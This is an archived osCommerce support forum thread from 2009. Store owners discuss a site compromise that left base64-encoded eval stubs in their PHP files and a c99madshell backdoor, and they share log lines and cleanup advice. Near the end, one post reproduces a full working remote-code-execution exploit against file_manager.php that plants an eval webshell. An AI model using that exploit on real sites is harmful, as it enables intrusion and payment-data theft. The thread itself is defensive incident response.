Jump to content
Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

Weedwaka

Did Someone hack my site ? ( Eval Base64 Decode )

Recommended Posts

I was doing some updating on my site and I notices some strange code appearing in all of my php files at the top .

 

What is this ? I sure as hell did not put it there ? Should I erase it all ?

 

Can I tell when it was added ?

 

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p

Share this post


Link to post
Share on other sites

Hi David

 

I have found this crap also on my site over the last couple of days, but I believe it has a very sinister reason for being there. I am waiting for a response from 1 customer, but I believe Paypal payments have been directed somewhere else from the shopping cart which normally comes back to the site awaiting verification.

 

Anyone else find this code embeded in your php code should follow said advice. I am in the process of getting rid,but it seems to be in nearly every php file. My permissions on my main site were set not to allow this kind of thing to happen as far as I was led to believe anyway, but I guess these b******s have got nothing better to do.

 

If you come up with any solutions let me know

Cheers

Gary

Share this post


Link to post
Share on other sites
Hi David

 

I have found this crap also on my site over the last couple of days, but I believe it has a very sinister reason for being there. I am waiting for a response from 1 customer, but I believe Paypal payments have been directed somewhere else from the shopping cart which normally comes back to the site awaiting verification.

 

Anyone else find this code embeded in your php code should follow said advice. I am in the process of getting rid,but it seems to be in nearly every php file. My permissions on my main site were set not to allow this kind of thing to happen as far as I was led to believe anyway, but I guess these b******s have got nothing better to do.

 

If you come up with any solutions let me know

Cheers

Gary

I got hacked by the same thing. It appears to randomly seek out some file to put its main code into, in my case its in a style.css.php buried deep into a subdomain. The wild thing is, this subdomain (being in a subfolder of my main catalog folder) is running Joomla, and not osCommerce, but the infection came from osCommerce. SO it must have searched for style.css.php and simply infect one it found, regardless of where that was. It put some 128 kB of scripting code into this file, base64 encoded TWICE!!! You decode it once, and get base64_decode again, after decoding that, I get a whole bunch of functions with mangled names, so that t becomes less than obvious to analyse the code. I have only started to look and figure out what it does. Part of the code will put a small stub (again base64 encoded) into each and every .php file within your domain, that makes sure this thing gets called whenever anyone hits your site.

If there is anyone here interested in finding out what this thing does, I could mail you the code (decoded version). It is way too long to post.

I reinstalled the entire site from a backup to make sure all traces have been removed. My main concern now is to find out how they sneaked in and how to close the whole. As a potential starting point these lines fromthe server log might be helpful:

94.142.129.147 - - [04/Sep/2009:16:45:25 -0500] "POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 302 - "http://www.pipeloops.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
94.142.129.147 - - [04/Sep/2009:16:45:26 -0500] "GET /admin/file_manager.php?info=main.inc.php&osCAdminID=f983a9883258789a847ef8ba20a0c26b HTTP/1.1" 302 - "http://www.pipeloops.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
94.142.129.147 - - [04/Sep/2009:16:45:27 -0500] "GET /admin/login.php?osCAdminID=f983a9883258789a847ef8ba20a0c26b HTTP/1.1" 200 3626 "http://www.pipeloops.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
94.142.129.147 - - [04/Sep/2009:16:45:27 -0500] "GET /main.inc.php?dginit HTTP/1.1" 200 481708 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"

Quite obviously it somehow managed to get into the admin filemanager. The IP btw is from Lettland. I suppose main.inc.php (see the log snippet above) was POSTed to the server and then executed to infect the site. Needless to say that the Security Pro and the anti-xss contrib are both installed and running on the site.

 

I'm thankful for any insight into how to avoid such attacks in the future.

 

Good I had a crecent backup!!!

 

Regards

Reiner

Share this post


Link to post
Share on other sites

Well I have managed to deleted most of it without scrubing the site. My worst fears about Paypal redirection were not correct. I was panic mode (as you do),

but somehow it doesnt like to be deleted from account.php & account_edit.php without causing some scripting errors on the site. I do have backups which are available abiet a little older. I havn't attempted this from scratch as yet, so do you re-install osc then use the backup to get the site back as it was?

My counterpart in the US is also looking into what can be done. Deleting it piece meal and seeing what happens is a slow process to eliminate the eval text. At least as far as I can tell, what I have deleted hasn't re-written itself to the same files again, but is there an easier way?

Thanks for the input anyway, it all adds to fitting some sort of puzzle together.

Share this post


Link to post
Share on other sites
Well I have managed to deleted most of it without scrubing the site. My worst fears about Paypal redirection were not correct. I was panic mode (as you do),

but somehow it doesnt like to be deleted from account.php & account_edit.php without causing some scripting errors on the site. I do have backups which are available abiet a little older. I havn't attempted this from scratch as yet, so do you re-install osc then use the backup to get the site back as it was?

My counterpart in the US is also looking into what can be done. Deleting it piece meal and seeing what happens is a slow process to eliminate the eval text. At least as far as I can tell, what I have deleted hasn't re-written itself to the same files again, but is there an easier way?

Thanks for the input anyway, it all adds to fitting some sort of puzzle together.

 

 

Atleast I am not alone. I feel better that people with real knowledge of psp / oscommerce are on the hunt for a fix now.

 

What I did was pull the site onto my hard drive via ftp and do a search and replace to get rid of all the "top paragraph" style code which was placed in each .php file. I then looked for obvious files which were larger or did not match my older back up and removed them or copied over them .

 

I am having big problems with the site still as I cant get access to my admin panel and do not know why. It just opens a blank page and nothing happens. Aaaarg.

 

I think we will start seeing many more people showing up looking for help on this.. . hopefully we can figure this out

Share this post


Link to post
Share on other sites

Start reading here

 

Specifically my post about changing error_reporting and the posts by steve_s about getting it to write the errors to a log file.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

I don't know if its mentioned here already, I`ve not read through the whole thread, but its clear that this hack would have been prevented, by

 

1. Renaming the admin folder

2. Deleting File Manager from admin.

 

Both those security risks have been detailed here many times.

 

Regular backups are also essential:

 

Use AutoBackup Database in Admin http://addons.oscommerce.com/info/2314

AND Database backup manager http://addons.oscommerce.com/info/5769

also Backup of all store files in zip format http://addons.oscommerce.com/info/6986


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
Start reading here

 

Specifically my post about changing error_reporting and the posts by steve_s about getting it to write the errors to a log file.

 

Thanks Germ !!

 

I do get an error instead of o blank page now after changing my password in the file to match a new one I was forced to use for the sites control panel .

 

"Unable to connect to database server!"

Share this post


Link to post
Share on other sites

If your catalog side is working, look in the /catalog/includes/configure.php file

 

Particularly these lines

 

  define('DB_SERVER', ''); // eg, localhost - should not be empty for productive servers
 define('DB_SERVER_USERNAME', '');
 define('DB_SERVER_PASSWORD', '');
 define('DB_DATABASE', '');

Whatever are in these lines on the catalog side needs to be repeated on the admin side configure file (if the catalog is functional)

 

Also be aware of this:

 

In the includes FOLDER (catalog and admin) where the normal configure.php files are there is a FOLDER named local

 

On some installs there may be a configure.php inside the local FOLDER (catalog and admin)

 

If there is, anything in it overrides anything in the normal configure.php files.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Hello all,

 

of course Sam's post above is right: This attack would have been prevente with admin renamed and filemanager removed, since this is the door the hacker used. It is frightening though how easy it seems to be to get code into a site if you only know the name and path to a vulnerable script.

 

BTW, I did not reinstall osCommerce, basically I renamed my top-level folder and then loaded up everything from the backup, which I had done after the last change to my files. I only needed to move a few binary files fromt he old folder to the new one, all in all it took about an hour to get back onlin (most of that time was the time it took to upload everything).

 

I also analysed the code a bit and will do a bit more of that this evening. It looks to me as if the hacker put a file called main.inc.php on the server using file_manager and then executed the script contained in this file by calling it up in the browser. The script looked then looked for a nice cozy place to bury its files deep down in the vaults of the store, in my case within a subdomain running Joomla. It put several files in there, one of them being style.css.php, and hence executable by the browser. This file contains the actual code. First of all it includes code to put a small stub (base64 encoded) into each and every php-file on the site. This stub contains code that looks for the malicious style.css.php file and loads it any time a page is loaded. It then calls some function buried within the style.css.php file.

 

The style.css.php is actually base64_encoded twice, i.e. after decoding it, you get a set of about 45 eval(base64_decode(...) blocks. After decoding these you have the malware sripts. I have not yet fully discovered what this code does, it is written explicitely to be hard to follow (all function names and variables are mangled, so that it is hard to trace). I did find a few URLs inside (these were again encoded within the script to hide them), and, interestingly enough, a small text in a most likely eastern European language, that includes the e-mail of the attacker. I am very curious what this text means. If I don't succed translating it, I'll post it here this evening and see if someone on the forum can figure it out. The code does have logic included to login somewhere (presumably on one of the URLs I found), and it does have some formatting code and the like. I assume it does log the inputs done by the store users and puts them into nicely formatted pages on the hackers site, so he can get at the collected data easily. I also found out that there are no SQL statements inside the code, so it does not appear to sniff inside the database.

 

Hope someone here finds this interesting.

 

After posting this it occured to me that the hacker will find this also interesting, and may be change the names of his servers to hide himself?

 

Regards

Reiner

Share this post


Link to post
Share on other sites
If your catalog side is working, look in the /catalog/includes/configure.php file

 

Particularly these lines

 

  define('DB_SERVER', ''); // eg, localhost - should not be empty for productive servers
 define('DB_SERVER_USERNAME', '');
 define('DB_SERVER_PASSWORD', '');
 define('DB_DATABASE', '');

Whatever are in these lines on the catalog side needs to be repeated on the admin side configure file (if the catalog is functional)

 

Also be aware of this:

 

In the includes FOLDER (catalog and admin) where the normal configure.php files are there is a FOLDER named local

 

On some installs there may be a configure.php inside the local FOLDER (catalog and admin)

 

If there is, anything in it overrides anything in the normal configure.php files.

 

 

Thanks for the help.

 

The catalog itself is up and running fine with the exception of a new product carosel which can no longer find and display the products.

 

I checked these config files and they do match. I do not have the extra config file in the local folder. Still getting the "unable to connect to database server" warning.

 

I am sure its something simple I am missing arg !! Any more ideas ?

 

Thanks again !!

Share this post


Link to post
Share on other sites

On further investigating the hack, I was able to decode the file s.php that it had put on the server. It actually needed gzinflate(base64_deoced(...)) 48 times, before the script appeared. What I got then was a well known hacker's tool, c99madshell, just google for it and you know its pretty dangerous. Don't know what the guy was up to on my site with this.

 

If you have been hacked by this, go and look for the additional .php files (s.php, dg.php, in my case also style.css.php) and DELETE them!!!

 

Reiner

Share this post


Link to post
Share on other sites

Thanks for all the info...I would like to say however that I'm not a tech web guy at all and I am just trying to run a business, not a website guru tech guy to boot :rolleyes: . There is a wealth of info out there but not being into coding as such to start with is alot to take on,without all the other hassel all I'm trying to do is earn a crust! These permissions things should be setup as a rule by the software if it's that easy to manage and ideally all that secruity stuff aswell.

Still you live and learn (normally the hard way by experience) so thanks again guys for all this.

 

Cheers

Gaz

Share this post


Link to post
Share on other sites

In some design/development companies sort of encoding is used when clients are very dodgy with payment for their project and it's only one way to limit or show the full working demo for the client - encode the whole work.


Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Share this post


Link to post
Share on other sites
On further investigating the hack, I was able to decode the file s.php that it had put on the server. It actually needed gzinflate(base64_deoced(...)) 48 times, before the script appeared. What I got then was a well known hacker's tool, c99madshell, just google for it and you know its pretty dangerous. Don't know what the guy was up to on my site with this.

 

If you have been hacked by this, go and look for the additional .php files (s.php, dg.php, in my case also style.css.php) and DELETE them!!!

 

Reiner

 

Yeah, I found these as well in the same folder.

Share this post


Link to post
Share on other sites

Thanks for the links, Spooks, I looked at the 3rd one to backup the files and it was in spanish and says to put the backup file on the root (and being suddenly paranoid due to this base decode injection and how this person found my website which is still in development!), I'm wondering if this can be exploited by calling it in the browser for some nefarious purpose, especially cuz I no comprende the spanish code- ah, guess thats what happens when you're violated, certainly has been a learning experience regarding security precautions

 

Nice work, Reiner, investigating this insidious code, I am hopeful that by removing the decode the rest of the file is intact or is there a possibility that something else is embedded in each file that I should be on the lookout for

 

here is a link to a good article regarding hacker minimizing steps

http://www.clubosc.com/hacked-oscommerce-e...al-reading.html

 

jk

Share this post


Link to post
Share on other sites
Folder permissions should NEVER be higher tha 755 - EVER.

 

These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.

 

Please note in the osCommerce 2.2 Milestone 2 Update 051112 Documentation on page 9:

 

Set the permissions on /catalog/images directory to 777.

Reset the permissions on /catalog/admin/includes/configure.php to 644.

Create the dir /catalog/admin/backups and set the permissions to 777.

Set the permissions on /catalog/admin/images/graphs directory to 777.

 

I followed the instructions that come with the above documentation and you say to change it. Why doesn't the documentation explain what you are saying? Will the documentation be updated with what you are saying now?

Share this post


Link to post
Share on other sites
I don't know if its mentioned here already, I`ve not read through the whole thread, but its clear that this hack would have been prevented, by

 

1. Renaming the admin folder

2. Deleting File Manager from admin.

 

Both those security risks have been detailed here many times.

 

Regular backups are also essential:

 

Use AutoBackup Database in Admin http://addons.oscommerce.com/info/2314

AND Database backup manager http://addons.oscommerce.com/info/5769

also Backup of all store files in zip format http://addons.oscommerce.com/info/6986

 

Aloha Sam,

 

This is the first time I read to DELETE the file manager from admin. Can you give the step by step direction. I am assuming you mean the File Manager in the TOOLS section of the admin panel? Step by step directions should be given for this one. I haven't a clue how to do this. That means that an integral part of the admin panel needs to be removed. By the way, why would this be necessary? Why can't this feature be secure and other parts of the admin control panel are left? Why pick out this particular feature and remove it?

 

The way this hack has shown up in the past ten days or so seems to indicate a big deal, doesn't it?

Share this post


Link to post
Share on other sites
Aloha Sam,

 

This is the first time I read to DELETE the file manager from admin. Can you give the step by step direction. I am assuming you mean the File Manager in the TOOLS section of the admin panel? Step by step directions should be given for this one. I haven't a clue how to do this. That means that an integral part of the admin panel needs to be removed. By the way, why would this be necessary? Why can't this feature be secure and other parts of the admin control panel are left? Why pick out this particular feature and remove it?

 

The way this hack has shown up in the past ten days or so seems to indicate a big deal, doesn't it?

 

I would like to delete the file manager also.

Share this post


Link to post
Share on other sites

Maybe someone could start a sticky with just information ( FACTS ONLY ) on this hack. Files to look for and known behavior .

 

I think many more people are going to be hit with this and will be coming here for help.

Share this post


Link to post
Share on other sites
I would like to delete the file manager also.

In the admin directoy delete or rename file_manager.php. If you choose to rename it, the safest is to make sure you rename the extension, so it is not a php file any more.

You should also rename your admin folder. If you do this, make sure you edit the configure.php file in the admin/includes folder. This file defines where the admin files are located and so contains references to the "admin" folder. These need to be changed to the new name. This should help to hide potentially vulnerable files from attackers.

 

BTW, I still have not figured out HOW the attacker got into my site, only that he managed to get into the file manager. I also have no idea yet what the sripts did when a user visited my store. But I must say this hack is pretty sophisticated, it installed both a backdoor for the hacker (c99madshell), and also sripts that get executed with every hit on your site.

Share this post


Link to post
Share on other sites
BTW, I still have not figured out HOW the attacker got into my site, only that he managed to get into the file manager. I also have no idea yet what the sripts did when a user visited my store. But I must say this hack is pretty sophisticated, it installed both a backdoor for the hacker (c99madshell), and also sripts that get executed with every hit on your site.

 

The "HOW" is clear now. Googeling for file_manager.php brought me to a security report for code injection into file_manager.php in osCOmmerce RC2.2a. No fix is known yet (other than renaming or deleting file_manager.php).

 

Here is the exploit:

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

 

SO: DELETE OR RENAME THE FILE MANAGER!!!

Share this post


Link to post
Share on other sites

In attempting to discover how this hacker found my site since it's relatively new, I wonder if it's by googling for the information in the footer either the oscommerce logo or "powered by oscommerce" which would have potentially identified my site, for now I'm going to remove that footer tag and logo, also have read some info on this c99madshell script- very sobering indeed, is it true that merely browsing to an infected site exposes the user to infiltration?!- I'm even wondering if this script is embedded in any oscommerce contributions! I'm not sure if a contribution is scanned or sanitized or simply made available as is with the "use at your own risk" caveat- hopefully I'm just being unnecessarily concerned(read paranoid) as to the extent of this hacker script but I can envision how this code can spread its tentacles exponentially until it's not a virus, it's an internet plague!

I sincerely hope someone will chide me for this post and correct these irrational misgivings- cuz right now I am doing la freak!

 

jk

Share this post


Link to post
Share on other sites

A client of ours had his site compromised on the 04 Sept at 19:00; almost the same time as a couple of you.

 

I found the extra files in:

/catalog/admin/includes/languages/english/images/buttons/

 

These were the same as blueflametuna execpt I did not find style.css.php.orig.

 

I have removed the file_mananger.php script - what negative effects will this have on using the admin?

Either way it's got to be better than being hacked again.

 

Thanks for all the useful information posted so far.

 

It would be useful to have a dedicated forum for security updates which you could then subscribe to. Unless there is already a security announcement list which I am not aware of?

Share this post


Link to post
Share on other sites

In comparing an earlier copy of a site backup with the copy of the hacked site I noticed in the root directory of the hacked site was a jpeg with a name that looks kinda unusual and wasn't in the earlier backup copy of the site

the name of the jpeg was: -57x40.jpgs-57x40.jpgl-57x40, I didn't click on it so as not to disturb it-

I had added some contributions in between and am not sure if this is a legitimate name for a jpeg or something more sinister but thought I'd mention it in case it is connected with this hack or someone can explain what it's for...

 

jk

Share this post


Link to post
Share on other sites

×